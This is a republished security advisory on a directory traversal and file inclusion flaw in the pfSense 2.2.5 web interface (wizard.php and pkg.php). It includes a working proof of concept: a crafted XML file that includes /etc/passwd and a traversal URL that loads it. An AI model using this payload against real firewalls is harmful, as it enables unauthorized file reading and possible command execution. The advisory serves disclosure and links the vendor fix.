PFSense 2.2.5 Directory Traversal

Published
Credit
Risk
2015.12.19
R-73eN
Medium
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

# Title : PFSense <= 2.2.5 Directory Traversal
# Date : 18/12/2015
# Author : R-73eN
# Tested on : PFSense 2.2.5
# Software : https://github.com/pfsense/pfsense
# Vendor : https://pfsense.org/
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
# Fix provided by the vendor https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13
#
#


In pfsense <= 2.2.5 (Latest Version) , during a security audit i discovered the following vulnerabilities in the pfsense Webgui.

The following files are vulnerable to a file inclusion attack

wizard.php?xml=
pkg.php?xml=

Both of this files do not sanitize the path of the xml parameter and we can load xml files, and loading a special crafted xml file we can gain command execution.

Example:
1.xml (the filename can be whatever .txt , .jpg etc because it does not check for the file extension)

The content of the 1.xml should be:

<?xml version="1.0" encoding="utf-8" ?>
<pfsensewizard>
<totalsteps>12</totalsteps>
<step>
<id>1</id>
<title>LFI example </title>
<description>Lfi example </description>
<disableheader>on</disableheader>
<stepsubmitphpaction>step1_submitphpaction();</stepsubmitphpaction>
<includefile>/etc/passwd</includefile>
</step>
</pfsensewizard>

the parameter <includefile> is passed to a require_once() function which triggers the File inclusion Attack.
As we all know File inclusion attack can be converted to RCE very easily.

Then visiting

http://vulnhost/wizard.php?xml=../../../1.xml

where the "xml" parameter is the path of the crafted file, will trigger the vulnerability.

Thanks
Rio Sherri
https://www.infogen.al/ - Infogen AL


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com